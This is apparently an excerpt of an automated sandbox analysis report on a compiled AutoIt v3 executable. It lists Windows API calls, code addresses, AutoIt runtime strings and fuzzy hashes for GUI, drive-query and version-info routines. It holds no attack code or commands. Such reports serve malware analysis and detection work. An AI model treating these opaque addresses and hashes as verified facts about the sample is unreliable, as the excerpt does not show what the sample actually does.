                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0095763F
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00957683
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00957692
                                                                                                                • GetStockObject.GDI32(00000011), ref: 009576A2
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 009576A6
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009576B6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009576BF
                                                                                                                • DeleteDC.GDI32(00000000), ref: 009576C8
                                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009576F4
                                                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 0095770B
                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00957746
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0095775A
                                                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 0095776B
                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0095779B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 009577A6
                                                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009577B1
                                                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009577BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                • Opcode ID: 157059e5b073b38b5c9b946df6f9542a0d231a07574390ad45e469fe1cc372fa
                                                                                                                • Instruction ID: 16da7af806a1f8b9f0b3f27beabfab180fd2957ee40b6363a1b36c952ae8b651
                                                                                                                • Opcode Fuzzy Hash: 157059e5b073b38b5c9b946df6f9542a0d231a07574390ad45e469fe1cc372fa
                                                                                                                • Instruction Fuzzy Hash: 36A19271A14615BFEB10DBA9EC4AFAE7B69EF05710F004118FA15E72E0D7B0AD01DBA0
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0094AD1E
                                                                                                                • GetDriveTypeW.KERNEL32(?,0096FAC0,?,\\.\,0096F910), ref: 0094ADFB
                                                                                                                • SetErrorMode.KERNEL32(00000000,0096FAC0,?,\\.\,0096F910), ref: 0094AF59
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: b41eb59a8bac97849f4fc948e0140ce7d5b712e3cca081d24709850db22f2336
                                                                                                                • Instruction ID: f794c4dbd05b8863a7bfd79695fd889a4ec28ae5abb91d37c4232479cbf3cec3
                                                                                                                • Opcode Fuzzy Hash: b41eb59a8bac97849f4fc948e0140ce7d5b712e3cca081d24709850db22f2336
                                                                                                                • Instruction Fuzzy Hash: 5151F6F1688205EB8F10DB19C952CBE73A4FB8A318B6444AAF407E72D1CB769D05DB43
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: 408427c5ec920fc5ad7d4c6ca39ccf4091b1f7e098351295a39b6c868174a040
                                                                                                                • Instruction ID: 57f7e3438aa5012eb94d8e0da322d9a8b3a0f1776a8190a558fda36c2aef09af
                                                                                                                • Opcode Fuzzy Hash: 408427c5ec920fc5ad7d4c6ca39ccf4091b1f7e098351295a39b6c868174a040
                                                                                                                • Instruction Fuzzy Hash: C681F5B17002596ACB20AB35EC53FAA3B68FF66744F044025FD05EA1D6FB60DE61C251
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00969AD2
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00969B8B
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 00969BA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                • Opcode ID: 55b5bed3b4488bb97fade1a45ad5bc997b540ba14707f1b33bffa3be12573cec
                                                                                                                • Instruction ID: 9a940a5778bd6debdc4f139fd9e41b3bfab178153920c99b415022276a8df1f2
                                                                                                                • Opcode Fuzzy Hash: 55b5bed3b4488bb97fade1a45ad5bc997b540ba14707f1b33bffa3be12573cec
                                                                                                                • Instruction Fuzzy Hash: A702CE30208201AFDB25CF24C858BAABBEDFF4A714F04892DF999D62A1C775DD44DB52
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 0096A903
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0096A907
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0096A91D
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0096A928
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0096A92D
                                                                                                                • GetSysColor.USER32(00000011), ref: 0096A945
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096A953
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0096A964
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0096A96D
                                                                                                                • SelectObject.GDI32(?,?), ref: 0096A97A
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0096A999
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096A9B0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0096A9C5
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096A9ED
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0096AA14
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0096AA32
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 0096AA3D
                                                                                                                • GetSysColor.USER32(00000011), ref: 0096AA4B
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0096AA53
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0096AA67
                                                                                                                • SelectObject.GDI32(?,0096A5FA), ref: 0096AA7E
                                                                                                                • DeleteObject.GDI32(?), ref: 0096AA89
                                                                                                                • SelectObject.GDI32(?,?), ref: 0096AA8F
                                                                                                                • DeleteObject.GDI32(?), ref: 0096AA94
                                                                                                                • SetTextColor.GDI32(?,?), ref: 0096AA9A
                                                                                                                • SetBkColor.GDI32(?,?), ref: 0096AAA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: 3cc4e3812234470d693da2690c1cd81ab8b463fd7c5cee7b9f14564552e59764
                                                                                                                • Instruction ID: fa1d475f196973c7b894f33868cb8932046ab80d2a8ddd79797feea6fdc6a44f
                                                                                                                • Opcode Fuzzy Hash: 3cc4e3812234470d693da2690c1cd81ab8b463fd7c5cee7b9f14564552e59764
                                                                                                                • Instruction Fuzzy Hash: CD513D71914208EFDF109FA4EC48EAE7B79EF49320F214529F911AB2A1D7B59940EF90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00968AC1
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00968AD2
                                                                                                                • CharNextW.USER32(0000014E), ref: 00968B01
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00968B42
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00968B58
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00968B69
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00968B86
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00968BD8
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00968BEE
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00968C1F
                                                                                                                • _memset.LIBCMT ref: 00968C44
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00968C8D
                                                                                                                • _memset.LIBCMT ref: 00968CEC
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00968D16
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00968D6E
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00968E1B
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00968E3D
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00968E87
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00968EB4
                                                                                                                • DrawMenuBar.USER32(?), ref: 00968EC3
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 00968EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                • Opcode ID: 430a4092680ce4f329c0ba113d3d354a0384c91a2f1334b3d383d29a27d2f969
                                                                                                                • Instruction ID: 6411ee66714efff05d1de5d3561e32dff1377143c8b7e1521fb1e92a98d14c17
                                                                                                                • Opcode Fuzzy Hash: 430a4092680ce4f329c0ba113d3d354a0384c91a2f1334b3d383d29a27d2f969
                                                                                                                • Instruction Fuzzy Hash: 69E16070914218AFDF209FA4CC84EEF7BBDEF49754F10825AF915AA290DB748981DF60
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 009649CA
                                                                                                                • GetDesktopWindow.USER32 ref: 009649DF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 009649E6
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00964A48
                                                                                                                • DestroyWindow.USER32(?), ref: 00964A74
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00964A9D
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00964ABB
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00964AE1
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 00964AF6
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00964B09
                                                                                                                • IsWindowVisible.USER32(?), ref: 00964B29
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00964B44
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00964B58
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00964B70
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00964B96
                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00964BB0
                                                                                                                • CopyRect.USER32(?,?), ref: 00964BC7
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00964C32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: 36f64b5081292ac875da398ee44d31da641ea4cb7c671e0ec8eddf77047969ca
                                                                                                                • Instruction ID: db8c61340c930d268baf38d23ee3636990088be92375c6c8b93e5922e2912530
                                                                                                                • Opcode Fuzzy Hash: 36f64b5081292ac875da398ee44d31da641ea4cb7c671e0ec8eddf77047969ca
                                                                                                                • Instruction Fuzzy Hash: 64B1BE71608350AFDB04DFA9D844B6ABBE4FF89314F00892CF5999B2A1D7B1EC05CB56
                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 009444AC
                                                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 009444D2
                                                                                                                • _wcscpy.LIBCMT ref: 00944500
                                                                                                                • _wcscmp.LIBCMT ref: 0094450B
                                                                                                                • _wcscat.LIBCMT ref: 00944521
                                                                                                                • _wcsstr.LIBCMT ref: 0094452C
                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00944548
                                                                                                                • _wcscat.LIBCMT ref: 00944591
                                                                                                                • _wcscat.LIBCMT ref: 00944598
                                                                                                                • _wcsncpy.LIBCMT ref: 009445C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 699586101-1459072770
                                                                                                                • Opcode ID: 84162fd8dc6df9906fbabc3bf971a0c64768fb7da7b41aaa60a88bc01a243b6e
                                                                                                                • Instruction ID: 1ffa6960a1e7395188653bdbc3c0a7e369070c9fd7cf4c870fde9db9bc17d5d6
                                                                                                                • Opcode Fuzzy Hash: 84162fd8dc6df9906fbabc3bf971a0c64768fb7da7b41aaa60a88bc01a243b6e
                                                                                                                • Instruction Fuzzy Hash: 3941D472A002047FDB10AB74DC47FBF77ACEFC2710F14456AF905E61C2EA75AA0196A5
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E28BC
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 008E28C4
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008E28EF
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 008E28F7
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 008E291C
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008E2939
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008E2949
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008E297C
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008E2990
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 008E29AE
                                                                                                                • GetStockObject.GDI32(00000011), ref: 008E29CA
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 008E29D5
                                                                                                                  • Part of subcall function 008E2344: GetCursorPos.USER32(?), ref: 008E2357
                                                                                                                  • Part of subcall function 008E2344: ScreenToClient.USER32(009A57B0,?), ref: 008E2374
                                                                                                                  • Part of subcall function 008E2344: GetAsyncKeyState.USER32(00000001), ref: 008E2399
                                                                                                                  • Part of subcall function 008E2344: GetAsyncKeyState.USER32(00000002), ref: 008E23A7
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,008E1256), ref: 008E29FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: 2c387f54bfd3ca00fba78a00503deacc76716c94ee88e0cbeb4cb57ceea8e097
                                                                                                                • Instruction ID: 48d389328294f633c91fba138c134adf5c58c27d9aa435e2d9b66dd71edcca14
                                                                                                                • Opcode Fuzzy Hash: 2c387f54bfd3ca00fba78a00503deacc76716c94ee88e0cbeb4cb57ceea8e097
                                                                                                                • Instruction Fuzzy Hash: 09B1AC71A5424AEFDB14DFA8DC55BAE7BB8FB09310F104129FA16E72A0CB74A840DB50
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00963E6F
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00963F2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                • Opcode ID: 05bfb36e6793ece0b606232a13622c1fa17249b2e1545e8e774129be1e977968
                                                                                                                • Instruction ID: 1c2a1e10b5b1b40b299eff219a3cfc358d28833f7ad7a522805b178fc3a9ba02
                                                                                                                • Opcode Fuzzy Hash: 05bfb36e6793ece0b606232a13622c1fa17249b2e1545e8e774129be1e977968
                                                                                                                • Instruction Fuzzy Hash: 9FA17A302143519FCB14EF69C852B6AB7A5FF96314F10882CF8A69B2D2DB71ED05CB52
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0093A47A
                                                                                                                • __swprintf.LIBCMT ref: 0093A51B
                                                                                                                • _wcscmp.LIBCMT ref: 0093A52E
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0093A583
                                                                                                                • _wcscmp.LIBCMT ref: 0093A5BF
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0093A5F6
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0093A648
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0093A67E
                                                                                                                • GetParent.USER32(?), ref: 0093A69C
                                                                                                                • ScreenToClient.USER32(00000000), ref: 0093A6A3
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0093A71D
                                                                                                                • _wcscmp.LIBCMT ref: 0093A731
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0093A757
                                                                                                                • _wcscmp.LIBCMT ref: 0093A76B
                                                                                                                  • Part of subcall function 0090362C: _iswctype.LIBCMT ref: 00903634
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3744389584-679674701
                                                                                                                • Opcode ID: a93e8ada849fc477a2e691761c04ac62a4b8bc4e356b9ea91825c19596caeee3
                                                                                                                • Instruction ID: 1e9870ea59fd5de4f1f0145b886b3dd4e6988ecbc914586caf78c55e7675aef5
                                                                                                                • Opcode Fuzzy Hash: a93e8ada849fc477a2e691761c04ac62a4b8bc4e356b9ea91825c19596caeee3
                                                                                                                • Instruction Fuzzy Hash: 35A1AD71604606AFDB14DF64C888BAAB7ECFF44354F008629F9DAD21A0DB34E955CF92
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0093AF18
                                                                                                                • _wcscmp.LIBCMT ref: 0093AF29
